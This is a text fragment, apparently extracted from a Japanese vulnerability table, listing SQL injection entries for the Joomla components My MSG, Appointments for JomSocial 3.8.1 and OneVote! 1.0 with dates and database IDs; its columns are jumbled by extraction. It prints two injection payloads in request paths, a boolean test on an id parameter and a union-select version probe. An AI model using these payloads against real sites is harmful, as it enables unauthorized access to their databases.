Joomla!
Component
My MSG 3.2.1
2017-02-25 41462 SQL Injection 易 中
Joomla! Component
Appointments for JomSocial
3.8.1 - /my-appointments/my-
appointments/ SQL Injection 脆
弱性
/my-appointments/my-
appointments/edit?id=1%20and%201=1--Joomla
Joomla!
Component
Appointments
for JomSocial
3.8.1
2017-02-27 41470 SQL Injection 易 中
Joomla! Component OneVote!
1.0 - results.php SQL Injection
脆弱性
/components/com_onevote/results.php?election_id=+/*!50
000union*/+select+@@version-- -Joomla
Joomla!
Component
OneVote! 1.0